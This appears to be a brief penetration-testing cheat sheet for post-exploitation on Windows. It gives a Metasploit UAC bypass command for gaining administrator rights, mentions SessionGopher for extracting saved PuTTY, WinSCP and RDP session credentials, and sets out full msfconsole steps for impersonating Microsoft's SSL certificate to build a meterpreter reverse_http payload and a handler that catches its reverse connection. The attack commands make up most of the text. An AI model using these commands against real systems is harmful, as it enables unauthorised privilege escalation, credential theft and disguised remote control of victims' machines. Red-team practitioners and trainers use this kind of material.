Introduction

4 post-exploit steps

  1. Privilege Escalation and Maintaining Access

  2. Data Harvesting

  3. Internal Network Scan

  4. Exploitation of new systems and pivoting

Metasploit also ships a compiled UAC bypass payload at /usr/share/metasploit-framework/data/post/bypassuac-x64.exe

To use it, copy the executable to the target system and run it from cmd:

bypassuac-x64.exe cmd.exe

This gives you a cmd shell as the same user, but with administrator privileges.

use multi/handler
<snip>
set AutoRunScript explorer.exe
set AutoRunScript migrate -f

SessionGopher

SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.

Impersonate SSL

In msfconsole, there is an aux module to do this:

use auxiliary/gather/impersonate_ssl
set RHOST www.microsoft.com
run

Then generate the payload:

use payload/windows/x64/meterpreter/reverse_http
set LHOST x.x.x.x
set LPORT xxxx
set handlersslcert <path_to_impersonate_pem>
set stagerverifysslcert true
generate -t exe -f <destination_path>

Then create a multi handler with the same config:

use exploit/multi/handler
set LHOST x.x.x.x
set LPORT xxxx
set handlersslcert <path_to_impersonate_pem>
set stagerverifysslcert true
set payload windows/x64/meterpreter/reverse_http
exploit -j
